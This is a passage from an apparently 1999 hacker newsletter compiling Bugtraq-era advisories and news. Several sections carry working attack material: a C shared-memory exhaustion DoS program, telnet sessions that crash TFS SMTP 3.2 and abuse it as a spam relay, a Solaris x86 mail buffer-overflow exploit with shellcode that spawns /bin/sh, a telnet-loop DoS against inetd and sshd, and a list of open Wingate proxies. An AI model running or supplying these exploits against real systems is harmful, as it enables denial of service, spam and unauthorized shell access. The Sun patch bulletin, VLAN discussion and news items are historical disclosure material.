~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
KKI Security Team Cracow Commercial Internet
http://www.security.kki.pl http://www.kki.pl
mailto:security@security.kki.pl mailto:biuro@kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Raport title : Shared Memory DoS - IPC vulnerability (Linux
abuse as example)
Problem found by : Robert Pajak (shadow@security.kki.pl),
probably other ppl found that first - one of them is
lcamtuf, Solar Designer is probably other...
Raport created by : Robert Pajak (shadow@security.kki.pl)
Lukasz Luzar (lluzar@security.kki.pl)
Raport published : 14 September, 1999
Raport code : KKIS.14091999.004.b
Vulnerable programs : system vulnerability...
Systems affected : Linux, other (?) ...
Archive : http://www.security.kki.pl/advisories/
Risk level : high
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Useing attached program one can DoS machine even when limits are set
up...
This is due to fact that shared memory segments can exist without
beeing bind with processes. To protect you should diable this
operations, or use Solar Designer's stack patch with limits set,
etc...
Alan Cox has been notified...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Local Denial of Services attack - simple bypassing limits...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
/* SharedDream - (c) Shadow, KKI Security */
/* */
/* I'm not responsible for any damaged done by this proggie... */
/* It should be used only for education... */
/* To protect - use brain, Solar's patches, or whatever... */
/* This problem is because shared memory segments can exist even */
/* if they are not combined with programs! */
/* !This program will crash your machine (localy) at kernels 2.x! */
/* If you are on kernels 2.2.x with limits run it twice :) */
/* really - even when rescource limits are set! :) */
/* Probably original idea by lcamtuf */
/* heck you should told me that you found it */
/* first ;) */
/* heh - worm greetings for for Coding Style ;) */
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#define BOLD "\033[00;04m"
#define BLUE "\033[00;36m"
#define STAN "\033[00;00m"
void main(void)
{
char *p;
int i = 10000000;
printf("\n\n");
printf(BOLD "*)" BLUE " SharedDream"STAN" - shared memory segments
abuser\n");
printf(BOLD "*)\n" STAN);
printf(BOLD "*)" STAN " (c) 1999" BOLD " Shadow " STAN "(" BOLD
"shadow@security.kki.pl" STAN ")\n");
printf(BOLD "*)" STAN " greetz to " BOLD " vision (yo remember me),
lcamtuf, kodzak, #??? ppl, Lam3rz, daworm, Trolinka, viedzmin other folks i
forgot to mention\n" STAN);
printf(BOLD "*)" STAN " Now it will eat up your memory even if it seems to
be limited\n");
printf(BOLD "*)" STAN " Starting...");
fflush(stdout);
while (1)
if (p = shmat(shmget(0, i, 0777), 0, 0))
memset( p,'\0',i); // need to touch
memory somehow
printf(".DoW.");
fflush(stdout);
}
else {
i--;
}
}
exit(0);
}
~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright
statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.
All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
@HWA
66.0 TenFour TFS SMTP 3.2 Buffer Overflow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow
To: BUGTRAQ@SECURITYFOCUS.COM
INTRINsec Security Advisory
Release Date : August 30, 1999
Software : TenFour TFS SMTP 3.2
Operating System: Windows NT 3.x / 4.x
Impact : The attackers can use a misconfigured TFS SMTP for
spamming and can remotely crash the TFS SMTP Gateway.
Author : Christophe.Lesur@INTRINsec.com
Status : TenFour is advised from this.
URLs : http://www.intrinsec.com/
__ Diggest __
The TenFour TFS SMTP Release 3.2 has two vulnerabilities : A buffer overflow
and, under some circumstances and due to inherent TFS architecture, it can
be used for spamming.
Direct results are that an attacker can remotly crash your TFS SMTP Gateway
or send unsollicited mails to someone ( and TFS ADMINISTRATOR ).
Tenfour is advised from this. Thanks to Roberto Correnti for his support.
(http://www.tenfour.com)
__ Technical Details and Exploits __
TENFOUR TFS SMTP Version 3.2 has two vulnerabilities : a buffer overflow and
under some circumstances it can be used for spamming.
First : Buffer Overflow.
There is a major buffer overflow in TFS SMTP 3.2. When you connect to the
SMTP service on port 25, you get the TFS PROMPT. After sending the 'helo'
command, if you send a 'MAIL FROM' larger than 128 bytes, you will crash the
SMTP service with a nice protection fault. It's basically a buffer overflow
and this has been fixed in release 4.0
This is the exploit :
[clesur@raptor clesur]$ telnet mailhost.victim.com 25
Trying 1.1.1.1...
Connected to mailhost.victim.com.
Escape character is '^]'.
220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2
helo
250 mailhost.victim.com, Hello
mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd>
Connection closed by foreign host.
Second : Spamming
The TFS SMTP Engine accepts any mails by default and process them in its kernel.
In case of a deficient message (wrong recipient, wrong domain...) TFS SMTP is
usually configured to warn sender and the TFS ADMINISTRATOR by sending a 4-line warning
AND the full message. Because there is no domain check before sending the message to
the TFS core, it's possible to spam someone and the TFS administrator.
This is the exploit :
[clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25
Trying 1.1.1.1...
Connected to mailhost.tfsvictim.com.
Escape character is '^]'.
220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2
helo
250 mailhost.tfsvictim.com, Hello
mail from:<target@victim.com>
250 Sender <target@victim.com> OK
rcpt to:<target@victim.com>
250 Recipient <target@victim.com> OK
data
354 Begin data transfer. End with period.
from: target@victim.com
to: target@victim.com
<YOUR MESSAGE BODY HERE>
.
250 Message accepted
quit
221 Connection closed
Connection closed by foreign host.
The spammed user will receive this message in its mailbox.
Message 22:
From target@victim.com Thu Jul 29 09:49:40 1999
Delivered-To: target@victim.com
From: target@victim.com
Date: Thu, 29 Jul 1999 11:44:03 +0200
Subject: <No subject>
MIME-version: 1.0
Content-transfer-encoding: quoted-printable
####################################################
This message was not delivered to
target@victim.com
TFS Admin was informed with a copy of this message
Sender was informed with a copy of this message
####################################################
<YOUR MESSAGE BODY HERE>
__ Solutions __
For theses vulnerabilities, TenFour suggests upgrading to a version greater
than 4.0.
__ Contacts __
-- Tenfour --
TenFour South Europe
ITFamily Sarl
Le Technoparc
15, rue Edouard Jeanneret
78306 Poissy Cedex
France
Tel: +33 1 39 22 65 15
Fax: +33 1 39 11 49 77
WWW: http://www.tenfour.fr
-- INTRINsec --
INTRINsec is a computer Security company.
http://www.INTRINsec.com
This advisory is available in french.
Cet avis est disponible en francais sur notre site.
__ DISCLAMERS __
INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDED
THESES INFORMATIONS "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT
LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
--
Christophe Lesur Security Consultant
INTRINsec
mailto:christophe.lesur@INTRINsec.com
@HWA
67.0 Solaris 2.7 /usr/bin/mail exploit/buffer overflow vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Solaris 2.7 /usr/bin/mail
To: BUGTRAQ@SECURITYFOCUS.COM
Greetings,
There is a possible buffer overflow vulnerability in Solaris 2.7's sgid
mail /usr/bin/mail. The reason it's only a possibility and not a full
blow exploit is that mail drops sgid privs before the overflow occurs.
However as we've seen in several past posts, this is not necessarily a
bulletproof method of making ones program secure. Obviously mail needs
these privs to perform some function, probably opening the appropriate
mail owned files to deliver mail. My guess would be that in the
following usage, mail would need write (read?) access to foo's mail file.
bash-2.02$ mail -m `perl -e "print 'A' x 2106"` foo
.
mail: ERROR signal 11
bash-2.02$
In any case, this overflow does allow execution of any command you wish
as shown in the program at the end of this message. I would imagine that
with some careful asm code, one would be able to exploit the specific
vulnerability that may exist. Information on exactly what mail does with
it's s bit would be helpful.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
--- solx86.c ---
/*
* Generic Solaris x86 exploit program by Brock Tellier
* Shellcode by Cheez Whiz
* gcc -o mailex solx86.c
* /usr/bin/mail -m `./mailex 0 1985 2285` foo
. <period, enter>
$ <not a rootshell ;)>
* Usage: ./mailex <offset> <NOPS> <BUFSIZE>
*
* Demonstrative program for mail vulnerability. mail apparently drops
privs
* before the overflow occurs so we're not going to have a sgid mail
shell.
* Perhaps someone could make some 'shellcode' to exploit an open file
* descriptor or something (whatever the reason mail is sgid mail).
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUF 10000
#define NOP 0x90
char shell[] =
"\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff"
"\xc3\x5e\x31\xc0\x89\x46\xc1\x88\x46"
"\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0"
"\x50\xb0\x17\xe8\xdf\xff\xff\xff\x83"
"\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53"
"\x8d\x1e\x89\x5e\x08\x53\xb0\x3b\xe8"
"\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff";
unsigned long int nop;
unsigned long int esp;
long int offset;
char buf[BUF];
unsigned long int get_esp()
{
__asm__("movl %esp,%eax");
}
void
main (int argc, char *argv[])
{
int buflen, i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
if (argc > 2)
nop = strtoul(argv[2], NULL, 0);
else
nop = 285;
if (argc > 3)
buflen=atoi(argv[3]);
else
buflen=BUF;
esp = get_esp();
memset(buf, NOP, buflen);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < buflen-4; i += 4)
*((int *) &buf[i]) = esp+offset;
for (i = 0; i < strlen(buf); i++) putchar(buf[i]);
return;
}
---
@HWA
68.0 remote DoS against inetd and ssh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: remote DoS against inetd and ssh
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
At the beginning i'd like to excuse all of you if it is commonly well
known (hmm, i guess it is, but noone patched it ;>.
Both DoS`s use something known as portfuck (e.g. `while true; do telnet
host port & done`).
1. If you use it against any inetd service, inetd will shoutdown that
service for about 30 minutes (i did not checked, but it seems to be about
that time).
2. If you use it against sshd, you have 99% that you crash the mashine in
few seconds.
TESTED:
sshd-1.2.26 on Debian 2.0
sshd-1.2.27 on Debian 2.1
sshd-1.2.27 on RedHat 5.2
inetd - one provided with Debian 2.0/2.1/Redhat 5.2
all above platforms are VULNURABLE to this attack
COMPROMISE:
Allows any user to hang many machines in the Internet (i guess that only
these behind a firewall are secure ;>
SOLUTION:
propaply running in ulimit envirmont (like qmail does) should help and
additionally in inetd remove this strange 'protection'.
regards,
greg AKA VanitaS
***************************************************************************
* Grzegorz Stelmaszek * For my public PGP key:
* mailto:greg@tenet.pl * finger:greg@tenet.pl
* http://www.tenet.pl * 18 E9 5E 6D 78 F0 11 F2
****************************** 45 CF CF 63 77 C0 A4 20
@HWA
69.0 Sun Security Bulletin #00189
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Sun Security Bulletin #00189 (fwd)
To: BUGTRAQ@SECURITYFOCUS.COM
--
Kis-Szabo Andras Technical University of Budapest
-----------------------------/ Schonherz Zoltan Dormitory
kisza@sch.bme.hu /-------------------------------3OO--->>>.Info
Fingerprint = 97 D7 32 CE F9 74 5C A0 E5 F4 09 29 67 9F A8 78
---------- Forwarded message ----------
Date: Wed, 8 Sep 1999 11:20:55 -0700
From: Sun Security Coordination Team <secure@sunsc.Eng.Sun.COM>
To: CWS@sunsc.Eng.Sun.COM
Subject: Sun Security Bulletin #00189
-----BEGIN PGP SIGNED MESSAGE-----
________________________________________________________________________________
Sun Microsystems, Inc. Security Bulletin
Bulletin Number: #00189
Date: September 8, 1999
Cross-Ref:
Title: LC_MESSAGES
________________________________________________________________________________
The information contained in this Security Bulletin is provided "AS IS."
Sun makes no warranties of any kind whatsoever with respect to the information
contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS,
REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR
IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE
HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE,
PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL
OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY
ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN
THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF
THE POSSIBILITY OF SUCH DAMAGES.
If any of the above provisions are held to be in violation of applicable law,
void, or unenforceable in any jurisdiction, then such provisions are waived
to the extent necessary for this disclaimer to be otherwise enforceable in
such jurisdiction.
________________________________________________________________________________
1. Bulletin Topics
Sun announces the release of patches for Solaris(tm) 7 and 2.6 (SunOS(tm)
5.7 and 5.6) which relate to a buffer overflow vulnerability involving
the LC_MESSAGES environment variable.
Sun recommends that you install the patches listed in section 4
immediately on systems running SunOS 5.7 and 5.6.
2. Who is Affected
Vulnerable: SunOS 5.7, 5.7_x86, 5.6, 5.6_x86.
Not vulnerable: All other supported versions of SunOS.
3. Understanding the Vulnerability
In libc, the LC_MESSAGES environment variable affects the behavior of
messaging functions. A vulnerability exists where a buffer overflow
could be exploited to gain root access. The patches listed in this
bulletin address both libc and the ufsrestore and rcp binaries which
are statically linked against libc.
4. List of Patches
The following patches are available in relation to the above problem.
SunOS version Patch ID
_____________ _________
5.7 106541-07
5.7 ufsrestore 106793-03
5.7 rcp 107972-01
5.7_x86 106542-07
5.7_x86 ufsrestore 106794-03
5.7_x86 rcp 107973-01
5.6 105210-24
5.6 ufsrestore 105722-03
5.6 rcp 107991-01
5.6_x86 105211-22
5.6_x86 ufsrestore 105723-03
5.6_x86 rcp 107992-01
_______________________________________________________________________________
APPENDICES
A. Patches listed in this bulletin are available to all Sun customers at:
http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches
B. Checksums for the patches listed in this bulletin are available at:
ftp://sunsolve.sun.com/pub/patches/CHECKSUMS
C. Sun security bulletins are available at:
http://sunsolve.sun.com/pub-cgi/secBulletin.pl
D. Sun Security Coordination Team's PGP key is available at:
http://sunsolve.sun.com/pgpkey.txt
E. To report or inquire about a security problem with Sun software, contact
one or more of the following:
- Your local Sun Solution Center
- Your representative computer security response team, such as CERT
- Sun Security Coordination Team. Send email to:
security-alert@sun.com
F. To receive information or subscribe to our CWS (Customer Warning System)
mailing list, send email to:
security-alert@sun.com
with a subject line (not body) containing one of the following commands:
Command Information Returned/Action Taken
_______ _________________________________
help An explanation of how to get information
key Sun Security Coordination Team's PGP key
list A list of current security topics
query [topic] The email is treated as an inquiry and is forwarded to
the Security Coordination Team
report [topic] The email is treated as a security report and is
forwarded to the Security Coordination Team. Please
encrypt sensitive mail using Sun Security Coordination
Team's PGP key
send topic A short status summary or bulletin. For example, to
retrieve a Security Bulletin #00138, supply the
following in the subject line (not body):
send #138
subscribe Sender is added to our mailing list. To subscribe,
supply the following in the subject line (not body):
subscribe cws your-email-address
Note that your-email-address should be substituted
by your email address.
unsubscribe Sender is removed from the CWS mailing list.
________________________________________________________________________________
Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun,
Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks
of Sun Microsystems, Inc. in the United States and other countries. This
Security Bulletin may be reproduced and distributed, provided that this
Security Bulletin is not modified in any way and is attributed to
Sun Microsystems, Inc. and provided that such reproduction and distribution
is performed for non-commercial purposes.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBN9ajGLdzzzOFBFjJAQH6UAP/TeqiirvcgwPXeDGhVZ+zhbtllptxwCto
g9h++H1M8UN0WC5170OGNlGWTHqxVD3JwlIGwlev6ydvnDJCJg4ADXNnX7bW00rs
B3lPPl/s82iTeUPV5CGN9S0ZNIb0H9IlsN8v/dZCLGv9+3SryF1WO3kPAeOJIzsJ
C+AYwQ7ykEo=
=k8ch
-----END PGP SIGNATURE-----
@HWA
70.0 VLAN Security holes in cisco catalyst
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Re: VLAN Security
To: BUGTRAQ@SECURITYFOCUS.COM
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
You're right this is definitively a problem.
However I don't think it is related to the 802.1Q specification. Any
non-trunk port should discard 802.1Q frames because non-trunk ports
are just regular ethernet ports. We have a 2924M here, I'll test that
and alarm the whole company (boy, do I love this list :-) ).
FYI, something else you might want to try. The 802.1Q spec does not
have provisions for one instance of spanning tree per vlan (as
opposed to ISL). It means anyone can inject BPDUs into your network
and generate topology changes (or even claim to the be root switch).
Since most people use the STP defaults, the perpetrator only needs to
send one BPDU every 30 seconds to make sure that the connectivity to
be disrupted remains disrupted.
The important part of this is: with 802.1Q (one spanning for all
vlans), you can adversely affect any vlan, REGARDLESS of the vlan
you're a member of.
Cisco has fixed this by extending the spanning tree spec. They now
have something called Per Vlan Spanning Tree+. Check with Cisco for
specific version numbers.
Oh! And try SA6 on the 2924M-XL, it allows you to have a management
vlan other than vlan 1. Since vlan 1 cannot be removed from trunks,
someone could easily take control of your whole network of switches
if he/she could get his/her hands on vlan 1.
Yves Lepage
Consultant - Broadband Technology
Bell Nexxia
> -----Original Message-----
> From: Bugtraq List [mailto:BUGTRAQ@SECURITYFOCUS.COM]On Behalf Of
> bugtraq
> Sent: Wednesday, September 01, 1999 4:45 AM
> To: BUGTRAQ
> Subject: VLAN Security
>
>
> To Bugtraq,
>
> We have recently conducted some testing into the security of the
> implementation of VLANs on a pair of Cisco Catalyst 2900 series
> switches and we feel that the results of this testing might be of
> some value to the readers. Testing basically involved injecting
> 802.1q frames with forged VLAN identifiers into the switch in an
> attempt to get the frame to jump VLANs. A brief background is
> included below for those that might not be too familiar with VLANs.
> Others should skip to the end for the results.
>
> Background
> ==========
> Virtual LAN (VLAN) technology is used to create logically separate
> LANs on the same physical switch. Each port of the switch is
> assigned to a VLAN. In the case of the Cisco Catalyst, VLAN'ing is
> done at layer 2 of the OSI network model, which means that a layer
> 3 device (router) is required to get traffic between VLANs
> (possibly a filtering device).
>
> In addition to the above, VLANs may be extended beyond a single
> switch through the use of trunking between the switches. The trunk
> allows VLANs to exist on multiple switches. To preserve VLAN
> information across the trunk, the ethernet frame is 'wrapped' in a
> trunking protocol. Cisco have their own proprietary trunking
> protocol, but they also support the emerging 802.1q standard - we
> used 802.1q trunking in these tests.
>
> Basically, 802.1q adds a tag to the ethernet frame that specifies
> the VLAN that the frame belongs to. Thus, when it is transported
> between switches over the trunk, it is possible for the receiving
> switch to send the frame to the correct VLAN. In Cisco's
> implementation of 802.1q the tag is four bytes long and has the
> format "0x 80 00 0n nn" where nnn is the VLAN identifier. The tag
> is inserted into the ethernet frame immediately after the source
> MAC address. So, an ethernet frame entering switch 1 on a port
> that belongs to VLAN 4 has the tag "80 00 00 04" inserted. The
> 802.1q frame traverses the switch trunk and the tag is stripped
> from the frame before the frame leaves the destination switch port.
>
>
> For more information on 802.1q -
> http://grouper.ieee.org/groups/802/1/vlan.html
>
> During our tests we used the packet generation tool of Network
> Associates' Sniffer Pro v 2 to generate 802.1q frames with modified
> VLAN identifiers in an attempt to get frames to hops VLANs without
> the intervention of a layer 3 device.
>
> Findings
> ========
> We found that under specific conditions it was possible to inject
> frames into one VLAN and have them 'hop' to a different VLAN. This
> is a serious concern if the VLAN mechanism is being used to
> maintain a security gradient between two network segments. This
> has been discussed with Cisco and we believe that it is an issue
> with the 802.1q specification rather than an implementation issue.
>
> The trunk port, along with all the other ports, must be assigned to
> a VLAN. If some non-trunk ports on the switch share the same VLAN
> as the trunk port, then it is possible to inject modified 802.1q
> frames into these non-trunk ports, and have the frames hop to other
> VLANs on another switch.
>
> eg.
> Switch 1 has ports 1-12 on VLAN 1
> Switch 1 has ports 13-23 on VLAN 2
> Switch 1 has port 24 configured as an 802.1q trunk (VLAN 1)
> Switch 2 has ports 1-12 on VLAN 1
> Switch 2 has ports 13-23 on VLAN 2
> Switch 2 has port 24 configured as an 802.1q trunk (VLAN 1)
> Machine 1 is on port 1, switch 1.
> Machine 2 is on port 13, switch 2.
>
> We can send 802.1q frames with the following details...
> Source MAC = Machine 1
> Destination MAC = Machine 2
> VLAN ID = VLAN 2
> ...from machine 1 and they will arrive at machine 2.
>
> This will only occur if the trunk port belongs to the same VLAN as
> machine 1.
> * We tried this only for the trunk belonging to VLAN 1. We expect
> that similar results would be achieve if machine 1 and the trunk
> port shared VLAN 3, 4, ...
>
> Implications
> ============
> This is a problem if the following conditions are met:
> 1. The attacker has access to a switch port on the same VLAN as
> the trunk. 2. The target machine is on a different switch. 3.
> The attacker knows the MAC address of the target machine.
>
> In a real-life scenario, there may also be a requirement for some
> layer 3 device to provide a connection from VLAN 2 back to VLAN 1.
>
> Recommendations
> ===============
> Try not to use VLANs as a mechanism for enforcing security policy.
> They are great for segmenting networks, reducing broadcasts and
> collisions and so forth, but not as a security tool.
>
> If you MUST use them in a security context, ensure that the
> trunking ports have a unique native VLAN number.
>
> Final Notes
> ===========
> Thanks to those at Cisco who assisted in the handling of this
> issue. The two switches used for testing were WS-C2924M-XL's. They
> were both running 11.2(8)SA5. Additional information on test
> configuration will be made available on request.
>
> Regards,
>
> Dave Taylor (david.taylor@alphawest.com.au)
> Steve Schupp (steve.schupp@alphawest.com.au)
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.1 for non-commercial use <http://www.pgp.com>
iQA/AwUBN9Z1xqktD0ID/HtTEQI52QCg+ArG1J8hm63aqNUXIRao85JeBkQAnifY
KuP+Gs9wT0IWF4wVhpyKR+lx
=z1sQ
-----END PGP SIGNATURE-----
@HWA
71.0 Wingates list
~~~~~~~~~~~~~
I'm not responsible for anything you do with this list, they are presented here so that
the offending machines can fix their configurations so that they may not be abused (irc etc).
http://djice.freehosting.net/wingates.txt
208.45.226.110:1080
209.146.27.5:1080
adsl-216-103-210-236.dsl.snfc21.pacbell.net:1080
ns.elaso.cz:1080
mpa2.access.ch:1080
ip-207-60.dsl.dancris.com:1080
212.29.218.132:1080
btstts02c60.nbnet.nb.ca:1080
194.186.36.129:1080
ip240.fredericksburg3.va.pub-ip.psi.net:1080
@HWA
72.0 US Army Uses BO2K
~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
U.S. Army special agents from the Army Criminal
Investigation Command have 'proved' that NetBus and
Back Orifice can be used to hijack desktop camera and
microphone applications for the purposes of industrial
espionage, spying or to gather evidence for a criminal
investigation. The commandeered cameras and
microphones can then secretly send data to a
monitoring station unbeknownst to the end user.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,12891,00.html
(See section 33.0 Your Pc Could be Tapped)
@HWA
73.0 India And Pakistan Duke It Out In Cyberspace
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by no0ne
While more than 1000 soldiers from both India and
Pakistan died fighting in an undeclared war in the
mountains of Kashmir, the two countries were slugging it
out in cyber space too. Indian and Pakistani computer
professionals in the United States and Europe helped
their home countries by handing out information on how
to cripple the enemy's computer systems. An interview
with an Indian Army Major would not confirm that the
attacks on computer systems where sponsored by the
Pakistani government, and went on to say that India
would not resort to such childish acts as cyber
terrorism.
FairFax IT
http://www.it.fairfax.com.au/communications/19990921/A12383-1999Sep20.html
Sub-continent in Web war
By D. J. VARMA
Tuesday 21 September 1999
ANOTHER bloody
chapter was written in
history of the
sub-continent earlier in
the year, when more than
1000 soldiers from
Pakistan and India died
fighting an undeclared
war in the mountains of
Kashmir. Finally, after a
meeting between
President Clinton and
Pakistani Prime Minister
Nawaz Sharif in
Washington in July, all troops were withdrawn.
At the same time they have been fighting a war over
information, with several Internet resources hacked
in both countries. With some of the best software
skills in the world, the fighting over the Internet is just
as ferocious as in the snow-capped mountains of
Kashmir.
Several top Indian and Pakistani computer
professionals in America and Europe are "helping"
their respective governments by supplying
information on the best way to harm the enemy's
computer systems.
In October last year, anyone logging on to the Indian
army website www.armyinkashmir.org found
themselves viewing the contents of a Pakistani
Government website which gave an anti-Indian slant
on the Kashmir issue.
The Indian Government traced this hacking to a
Pakistan-based information services firm. The
hackers, using the handles of Gharib Hanif and
Munda Pakistani, successfully managed to divert all
logins to the Indian site to their own in Pakistan for
two days.
More recently, while battles raged in the mountains
in Kashmir in May, there was another attack on
www.armyinkashmir.org. With about 200 e-mails of
support and financial help being received daily by
the Indian Government at this Web address, the
mail component of the website was tampered with.
All pro-Indian e-mail was diverted to a different
address. The Indian armed forces, using some of
the best computer professionals in the country,
quickly recovered from the hack attack.
The Indian Government, in turn, cut off all network
access on 25June this year to the website of the
respected Pakistan newspaper Dawn at
www.dawn.com. Nobody from India could get
access to the Dawn website for more than a
fortnight.
Several Indian national newspapers campaigned for
the restoration of Internet access to Dawn, a
newspaper seen as a powerful voice for democracy
and moderation in Pakistan.
In the past year, most of the government sites in
these two countries, including the Bhabha Atomic
Research Centre where India's atomic technology
was developed, have been attacked.
The Indian army's webmaster, Major Vivek
Bhatnagar, at only 35, is typical of the new breed of
leading-edge Indian computer professionals serving
in the armed forces. He had five years of physical
training at the National Defence Academy while he
completed his BSc and B Tech, and later topped
the Advanced Computing course.
After a stint with Military Intelligence, he has taken
charge of the army's Internet cell. In an interview for
The Age he spoke about his team's role in
defending Indian military installations from the
hackers. Major Bhatnagar politely declined to
answer questions about more sensitive issues such
as whether the Pakistani intelligence agencies were
behind the attacks on Indian computer systems.
Bhatnagar said www.armyinkash- mir.org was the
first propaganda site managed by the Indian Armed
Forces to counter a Pakistani disinformation
campaign. "We were relatively new to the concept
and that was perhaps the reason why the whole
thing happened," he said.
"The site was not broken into or hacked as such.
What had actually happened was that somebody
had got the URL www.armyinkashmir.org lead to
some other site which was an anti-Indian site. This
was corrected within two days and the original site
was restored."
Bhatnagar said the Indian Government was aware
of Pakistan groups behind the attacks but would not
go into details. However, he said more than 100
were financed or set up by the Pakistan
Government.
The three official websites of the Indian Army are
www.armyinkashmir.org, armedforces.nic.in and
www.vijayinkargil.org/www.vijayinkargil.com.
Bhatnagar said the Indian Government would not
retaliate against hackers. "We do not believe in
hacking. Hacking is typically an immature,
irresponsible and illegal act. The Indian Armed
Forces do not resort to cheap gimmicks."
He confirmed that several Indian computing
professionals abroad had offered help. "Thousands
of offers came from all over the world. But mostly
they were from the US," he said.
"When the site was launched, we had tons of
e-mails offering all kinds of help. Offers ranged from
adopting a martyr's family to educating the children,
to hosting websites, to hacking Pakistani
propaganda sites to something as diverse as a
doctor from the US offering to come and cook for
the soldiers.
"The response of the Indian community worldwide
was tremendous and touching."
He acknowledged that the conflict was a good
example of a cyber-war, in terms of information
access. "While the world did have access to print
and electronic media, it was greatly restricted. The
cybermedia for the first time was available with
authentic and near real time information. A great
majority of people were thus relying upon this media
for daily updates."
Meanwhile, the publisher and chief executive of a
news group in Pakistan found the Internet edition of
Dawn the target of attack from India. Hameed
Haroon, 46, has masters degrees from Harvard and
Boston Universities. He also holds a BSc (Hons)
from the prestigious London School of Economics.
His reputation as a leading intellectual of the
sub-continent was further enhanced by his deft
handling of the Indian Government's attempts to cut
off internet access to Dawn during the conflict.
During the Kargil conflict earlier this year, he
believes Dawn was the only website that was
targeted.
"We started receiving complaints from our Indian
readers around 25June that they could not access
our website. We requested several of them to do a
`trace route', a program that traces the Internet path
between the computer asking for a web page and
the computer that has the subject page.
"About 15 people replied from different cities in
India. All except one said that they could not access
Dawn's site. And all except one subscribed to
VSNL- Videsh Sanchar Nigam Ltd, virtually India's
only Internet Service Provider.
"Four of them also sent us the results of trace routes
they had done. These clearly showed that VSNL's
backbone servers at their gateway in Mumbai
(Bombay) were blocking access to Dawn's web
site."
Haroon said he could not pinpoint whether a
particular story prompted the action. "Dawn has
earned its reputation as one of the most respected
newspapers in South Asia because of its balanced
response to the crises that periodically affect this
volatile region. That's why we have an influential,
albeit small readership in India - a readership of
policy makers, think tanks, diplomats, journalists
and academics - those who read our newspaper to
get an insight into the perceptions of the more
moderate and influential elements of Pakistani
public opinion.
"Failure to understand these perceptions can only
worsen current misunderstandings between both
nations." Haroon said there was no forewarning of
the impending blocking. "When it happened we
were convinced that it was the work of an
over-zealous sys-op at VSNL, rather than something
officially sanctioned."
Access to the site was restored to Indian readers on
13July.
"I'd like to clarify that access to our website was only
blocked to users in India, and everybody else in the
world could still visit our site. Our site was always
fully functional." He said that Dawn was a regular
target of hackers.
"There are attacks of varying severity almost on a
daily basis. There have also been a number of
attempts made to hijack our domain name. While I
cannot go into the details of our security measures,
we're comfortable in the knowledge that in the three
years our site has been operational, not a single
hacking attempt has been even remotely
successful."
The problems and surrounding publicity have lifted
